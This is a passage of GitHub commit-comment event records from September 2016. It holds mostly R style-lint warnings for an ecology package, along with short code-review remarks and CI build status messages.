1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n"}},"created_at":"2016-09-20T15:30:09Z"}
{"id":"4590447179","type":"CommitCommentEvent","actor":{"login":"james-woods"},"repo":{"name":"GoogleCloudPlatform/DataflowJavaSDK-examples"},"payload":{"comment":{"id":19098294,"position":86,"line":139,"path":"src/main/java/com/google/cloud/dataflow/examples/cookbook/DatastoreWordCount.java","commit_id":"d0f38ceff564c1a6fcc0e2b03e84cbe88cb8dd2e","created_at":"2016-09-20T15:30:16Z","updated_at":"2016-09-20T15:30:16Z","body":"Shouldn't \"getMutableProperties\" be used here?"}},"created_at":"2016-09-20T15:30:16Z"}
{"id":"4590447417","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098295,"position":23,"line":23,"path":"01-JS-DOM-APIs/assets/css/styles.css","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:30:18Z","updated_at":"2016-09-20T15:30:18Z","body":"This is the same as `padding: 10px 20px;`. Search for shorthand properties"}},"created_at":"2016-09-20T15:30:18Z"}
{"id":"4590447513","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098296,"position":33,"line":33,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:30:18Z","updated_at":"2016-09-20T15:30:18Z","body":"it makes sense."}},"created_at":"2016-09-20T15:30:18Z"}
{"id":"4590448943","type":"CommitCommentEvent","actor":{"login":"xuxingxing"},"repo":{"name":"xuxingxing/blog"},"payload":{"comment":{"id":19098300,"position":null,"line":null,"path":null,"commit_id":"dd6e37e98666d1606c88ea21db0d3ef8add2fb17","created_at":"2016-09-20T15:30:30Z","updated_at":"2016-09-20T15:30:30Z","body":"新创建的"}},"created_at":"2016-09-20T15:30:30Z"}
{"id":"4590449182","type":"CommitCommentEvent","actor":{"login":"dminkovsky"},"repo":{"name":"dminkovsky/graphql-java"},"payload":{"comment":{"id":19098301,"position":5,"line":19,"path":"src/main/antlr/Graphql.g4","commit_id":"c3f1e7d77b72a08482bb460e2f116b1d7b403aee","created_at":"2016-09-20T15:30:32Z","updated_at":"2016-09-20T15:30:32Z","body":"Yes I could have added a lexer rule but I took the approach in the JS impl where the operation definition type is just a name."}},"created_at":"2016-09-20T15:30:32Z"}
{"id":"4590449518","type":"CommitCommentEvent","actor":{"login":"alex-konovalov"},"repo":{"name":"alex-konovalov/gap-lesson"},"payload":{"comment":{"id":19098303,"position":null,"line":null,"path":null,"commit_id":"c1eb19188e823260bc8f823c06780c1f5a0880cb","created_at":"2016-09-20T15:30:34Z","updated_at":"2016-09-20T15:30:34Z","body":"@gvwilson deleted this file, but still to no avail"}},"created_at":"2016-09-20T15:30:34Z"}
{"id":"4590449903","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19098305,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-20T15:30:38Z","updated_at":"2016-09-20T15:30:38Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-20T15:30:38Z"}
{"id":"4590451392","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098308,"position":4,"line":4,"path":"01-JS-DOM-APIs/assets/css/styles.css","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:30:50Z","updated_at":"2016-09-20T15:30:50Z","body":"Avoid using tag selectors and try to implement **BEM**"}},"created_at":"2016-09-20T15:30:50Z"}
{"id":"4590459713","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19098325,"position":null,"line":null,"path":null,"commit_id":"a5fb9246158682619c421f820ad7ed351d29a0fd","created_at":"2016-09-20T15:32:02Z","updated_at":"2016-09-20T15:32:02Z","body":"@abisz congratz on 100th commit ! 🙌 🎉 😁"}},"created_at":"2016-09-20T15:32:02Z"}
{"id":"4590460474","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098326,"position":2,"line":2,"path":"01-JS-DOM-APIs/assets/scripts.js","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:32:09Z","updated_at":"2016-09-20T15:32:09Z","body":"Add space before an after `()`"}},"created_at":"2016-09-20T15:32:09Z"}
{"id":"4590460999","type":"CommitCommentEvent","actor":{"login":"dminkovsky"},"repo":{"name":"dminkovsky/graphql-java"},"payload":{"comment":{"id":19098329,"position":5,"line":19,"path":"src/main/antlr/Graphql.g4","commit_id":"c3f1e7d77b72a08482bb460e2f116b1d7b403aee","created_at":"2016-09-20T15:32:13Z","updated_at":"2016-09-20T15:32:13Z","body":"https://github.com/graphql/graphql-js/blob/master/src/language/parser.js#L209"}},"created_at":"2016-09-20T15:32:13Z"}
{"id":"4590463463","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098333,"position":null,"line":null,"path":null,"commit_id":"a795283e659e1c21866b922990b698ad7c0e6438","created_at":"2016-09-20T15:32:34Z","updated_at":"2016-09-20T15:32:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1074](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13668&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T15:32:34Z"}
{"id":"4590465434","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098338,"position":null,"line":null,"path":null,"commit_id":"a795283e659e1c21866b922990b698ad7c0e6438","created_at":"2016-09-20T15:32:52Z","updated_at":"2016-09-20T15:32:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1073](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13664&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Tests failed: 1 (1 new), passed: 63, ignored: 2) Build time: 00:08:57\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T15:32:52Z"}
